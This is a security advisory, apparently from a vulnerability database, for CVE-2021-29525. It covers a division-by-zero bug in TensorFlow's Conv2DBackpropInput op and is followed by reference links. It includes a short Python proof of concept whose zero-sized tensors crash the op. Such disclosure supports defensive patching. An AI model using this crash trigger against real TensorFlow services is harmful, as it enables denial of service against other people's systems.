CVE-2021-29525: Division by 0 in `Conv2DBackpropInput`
(updated )
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput:
import tensorflow as tf
input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor,
out_backprop=out_backprop, strides=[1, 1, 1, 1],
use_cudnn_on_gpu=True, padding='SAME',
explicit_paddings=[], data_format='NHWC',
dilations=[1, 1, 1, 1])
References
- github.com/advisories/GHSA-xm2v-8rrw-w9pm
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-453.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-651.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-162.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/2be2cdf3a123e231b16f766aa0e27d56b4606535
- github.com/tensorflow/tensorflow/security/advisories/GHSA-xm2v-8rrw-w9pm
- nvd.nist.gov/vuln/detail/CVE-2021-29525
Detect and mitigate CVE-2021-29525 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →